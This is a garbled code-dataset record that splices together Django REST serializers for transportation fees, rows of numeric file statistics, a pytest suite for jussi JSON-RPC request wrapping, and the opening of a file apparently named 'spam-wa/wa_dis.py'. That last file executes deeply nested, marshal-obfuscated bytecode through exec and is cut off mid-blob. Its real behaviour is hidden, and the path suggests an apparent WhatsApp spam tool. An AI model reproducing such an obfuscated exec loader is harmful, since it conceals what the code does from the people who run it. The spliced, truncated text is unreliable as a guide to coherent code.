    openid = serializers.CharField(required=False, read_only=False,
                                   validators=[datasolve.openid_validate])
    send_city = serializers.CharField(required=True, read_only=False,
                                      validators=[datasolve.data_validate])
    receiver_city = serializers.CharField(required=True, read_only=False,
                                          validators=[datasolve.data_validate])
    weight_fee = serializers.FloatField(required=True, read_only=False,
                                        validators=[datasolve.data_validate])
    volume_fee = serializers.FloatField(required=True, read_only=False,
                                        validators=[datasolve.data_validate])
    transportation_supplier = serializers.CharField(required=True, read_only=False,
                                                    validators=[datasolve.data_validate])
    # NOTE: 'creater' spelling must match the model field name.
    creater = serializers.CharField(required=True, read_only=False,
                                    validators=[datasolve.data_validate])

    class Meta:
        model = TransportationFeeListModel
        exclude = ['is_delete']
        read_only_fields = ['id', 'create_time', 'update_time']
class PaymentUpdateSerializer(serializers.ModelSerializer):
    """Write serializer for full (PUT) updates — all business fields required."""
    send_city = serializers.CharField(required=True, read_only=False,
                                      validators=[datasolve.data_validate])
    receiver_city = serializers.CharField(required=True, read_only=False,
                                          validators=[datasolve.data_validate])
    weight_fee = serializers.FloatField(required=True, read_only=False,
                                        validators=[datasolve.data_validate])
    volume_fee = serializers.FloatField(required=True, read_only=False,
                                        validators=[datasolve.data_validate])
    transportation_supplier = serializers.CharField(required=True, read_only=False,
                                                    validators=[datasolve.data_validate])
    # NOTE: 'creater' spelling must match the model field name.
    creater = serializers.CharField(required=True, read_only=False,
                                    validators=[datasolve.data_validate])

    class Meta:
        model = TransportationFeeListModel
        exclude = ['openid', 'is_delete']
        read_only_fields = ['id', 'create_time', 'update_time']
class PaymentPartialUpdateSerializer(serializers.ModelSerializer):
    """Write serializer for partial (PATCH) updates — every field optional."""
    send_city = serializers.CharField(required=False, read_only=False,
                                      validators=[datasolve.data_validate])
    receiver_city = serializers.CharField(required=False, read_only=False,
                                          validators=[datasolve.data_validate])
    weight_fee = serializers.FloatField(required=False, read_only=False,
                                        validators=[datasolve.data_validate])
    volume_fee = serializers.FloatField(required=False, read_only=False,
                                        validators=[datasolve.data_validate])
    transportation_supplier = serializers.CharField(required=False, read_only=False,
                                                    validators=[datasolve.data_validate])
    # NOTE: 'creater' spelling must match the model field name.
    creater = serializers.CharField(required=False, read_only=False,
                                    validators=[datasolve.data_validate])

    class Meta:
        model = TransportationFeeListModel
        exclude = ['openid', 'is_delete']
        read_only_fields = ['id', 'create_time', 'update_time']
| 67.8
| 122
| 0.77447
| 412
| 3,729
| 6.798544
| 0.126214
| 0.08854
| 0.088183
| 0.142449
| 0.906462
| 0.903963
| 0.888968
| 0.856837
| 0.776151
| 0.752945
| 0
| 0
| 0.116385
| 3,729
| 54
| 123
| 69.055556
| 0.850076
| 0
| 0
| 0.52
| 0
| 0
| 0.043443
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.06
| 0
| 0.76
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
0fa0a56ae97412f5daf75ef4abf2617cd0cd9210
| 9,101
|
py
|
Python
|
tests/test_jussi_request.py
|
bnchdrff/jussi
|
79d8decde323b84cdd8331e5cbb490021ea78cee
|
[
"MIT"
] | null | null | null |
tests/test_jussi_request.py
|
bnchdrff/jussi
|
79d8decde323b84cdd8331e5cbb490021ea78cee
|
[
"MIT"
] | null | null | null |
tests/test_jussi_request.py
|
bnchdrff/jussi
|
79d8decde323b84cdd8331e5cbb490021ea78cee
|
[
"MIT"
] | 1
|
2018-03-14T10:36:48.000Z
|
2018-03-14T10:36:48.000Z
|
# -*- coding: utf-8 -*-
from collections import OrderedDict
import os
from copy import deepcopy
import pytest
import ujson
import json
from .conftest import TEST_UPSTREAM_CONFIG
from jussi.errors import InvalidNamespaceError
from jussi.errors import InvalidNamespaceAPIError
from jussi.urn import URN
from jussi.upstream import _Upstreams
from jussi.request import JussiJSONRPCRequest
from .conftest import TEST_UPSTREAM_CONFIG
from .conftest import AttrDict
def test_request_id(urn_test_request_dicts):
    """The wrapper surfaces the JSON-RPC ``id`` field unchanged."""
    rpc_req, urn, url, ttl, timeout = urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.id == rpc_req.get('id')
def test_request_jsonrpc(urn_test_request_dicts):
    """Every wrapped request reports JSON-RPC protocol version 2.0."""
    rpc_req, urn, url, ttl, timeout = urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.jsonrpc == '2.0'
def test_request_method(full_urn_test_request_dicts):
    """The wrapper exposes the original JSON-RPC ``method`` verbatim."""
    rpc_req, parsed_urn, urn, url, ttl, timeout = full_urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.method == rpc_req['method']
def test_request_params(full_urn_test_request_dicts):
    """``params`` matches the source request; absent params default to False."""
    rpc_req, parsed_urn, urn, url, ttl, timeout = full_urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.params == rpc_req.get('params', False)
def test_request_urn(urn_test_request_dicts):
    """The wrapper's parsed URN equals the expected fixture URN."""
    rpc_req, expected_urn, url, ttl, timeout = urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.urn == expected_urn
def test_request_upstream(urn_test_request_dicts):
    """The resolved upstream URL matches the fixture's expected URL."""
    rpc_req, urn, expected_url, ttl, timeout = urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    # Env var must be set before resolving the upstream URL.
    os.environ['JUSSI_ACCOUNT_TRANSFER_STEEMD_URL'] = 'account_transfer_url'
    assert wrapped.upstream.url == expected_url
def test_request_batch_index(urn_test_request_dicts):
    """``batch_index`` reflects the position given to ``from_request``.

    Renamed from a duplicate ``test_request_urn`` definition: the second
    definition shadowed the real urn test above (so pytest never ran it)
    while its body actually exercised ``batch_index``, not the urn.
    """
    jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
    dummy_request = AttrDict()
    dummy_request.headers = dict()
    dummy_request['jussi_request_id'] = '123456789012345'
    dummy_request.app = AttrDict()
    dummy_request.app.config = AttrDict()
    dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
                                                    validate=False)
    jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
    assert jussi_request.batch_index == 0
    jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 1, jsonrpc_request)
    assert jussi_request.batch_index == 1
def test_request_to_dict(urn_test_request_dicts):
    """``to_dict()`` round-trips back to the source JSON-RPC request dict."""
    rpc_req, urn, url, ttl, timeout = urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.to_dict() == rpc_req
def test_request_to_json(urn_test_request_dicts):
    """``json()`` serializes to exactly what ``to_dict()`` reports."""
    rpc_req, urn, url, ttl, timeout = urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert ujson.loads(wrapped.json()) == wrapped.to_dict()
def test_upstream_id(urn_test_request_dicts):
    """``upstream_id`` is the jussi request id plus the batch index."""
    rpc_req, urn, url, ttl, timeout = urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.upstream_id == 123456789012345
    wrapped = JussiJSONRPCRequest.from_request(raw, 1, rpc_req)
    assert wrapped.upstream_id == 123456789012346
def test_upstream_headers(urn_test_request_dicts):
    """Upstream headers carry the request id and forward x-amzn-trace-id."""
    rpc_req, urn, url, ttl, timeout = urn_test_request_dicts
    raw = AttrDict()
    raw.app = AttrDict()
    raw.app.config = AttrDict()
    raw.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG, validate=False)
    raw.headers = dict()
    raw['jussi_request_id'] = '123456789012345'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.upstream_headers == {
        'x-jussi-request-id': '123456789012345'}
    # An incoming amazon trace header must be propagated upstream.
    raw.headers['x-amzn-trace-id'] = '1'
    wrapped = JussiJSONRPCRequest.from_request(raw, 0, rpc_req)
    assert wrapped.upstream_headers == {
        'x-jussi-request-id': '123456789012345',
        'x-amzn-trace-id': '1'
    }
def test_upstream_request(urn_test_request_dicts):
    """``to_upstream_request`` rewrites ``id`` to the upstream id, as dict and JSON.

    Renamed from ``upstream_request``: without the ``test_`` prefix pytest
    never collected this function, so its assertions never ran.
    """
    jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
    dummy_request = AttrDict()
    dummy_request.headers = dict()
    dummy_request['jussi_request_id'] = '123456789012345'
    dummy_request.app = AttrDict()
    dummy_request.app.config = AttrDict()
    dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
                                                    validate=False)
    jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
    cpy = deepcopy(jussi_request)
    cpy['id'] = 123456789012345
    assert jussi_request.to_upstream_request(as_json=False) == cpy
    assert jussi_request.to_upstream_request() == ujson.dumps(cpy,
                                                              ensure_ascii=False)
    cpy = deepcopy(jussi_request)
    cpy['id'] = 123456789012346
    jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 1, cpy)
    assert jussi_request.to_upstream_request(as_json=False) == cpy
    assert jussi_request.to_upstream_request() == ujson.dumps(cpy,
                                                              ensure_ascii=False)
def test_log_extra():
    """Placeholder: log_extra behavior is not yet specified."""
    # TODO: implement once log_extra semantics are pinned down.
    pass
def test_request_hash():
    """Placeholder: request hashing behavior is not yet specified."""
    # TODO: implement once request hashing semantics are pinned down.
    pass
| 42.929245
| 87
| 0.707395
| 1,035
| 9,101
| 5.861836
| 0.068599
| 0.176034
| 0.118675
| 0.075161
| 0.85792
| 0.853634
| 0.842426
| 0.823471
| 0.814406
| 0.814406
| 0
| 0.040717
| 0.209318
| 9,101
| 211
| 88
| 43.132701
| 0.80239
| 0.003406
| 0
| 0.738372
| 0
| 0
| 0.060004
| 0.00364
| 0
| 0
| 0
| 0.004739
| 0.104651
| 1
| 0.081395
| false
| 0.011628
| 0.081395
| 0
| 0.162791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0fc45380a2c68776c495ca1b84887f05d96c3305
| 185,747
|
py
|
Python
|
spam-wa/wa_dis.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
spam-wa/wa_dis.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
spam-wa/wa_dis.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
# Compile by Sanz
# Youtube : SANZ SOEKAMTI
# Github : https://github.com/B4N954N2-ID
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns8\xfe\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb2\xfd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns,\xfd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa6\xfc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns 
\xfc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x9a\xfb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x14\xfb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x8e\xfa\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x08\xfa\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x82\xf9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xfc\xf8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsv\xf8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf0\xf7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00
d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsj\xf7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe4\xf6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns^\xf6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xd8\xf5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsR\xf5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xcc\xf4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsF\xf4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xc0\xf3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns:\xf3\x00\x00\xe3\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb4\xf2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns.\xf2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa8\xf1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns"\xf1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x9c\xf0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x16\xf0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x90\xef\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\n\xef\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x0
1\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x84\xee\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xfe\xed\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsx\xed\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf2\xec\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsl\xec\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe6\xeb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns`\xeb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xda\xea\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsT\xea\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xce\xe9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsH\xe9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xc2\xe8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns<\xe8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\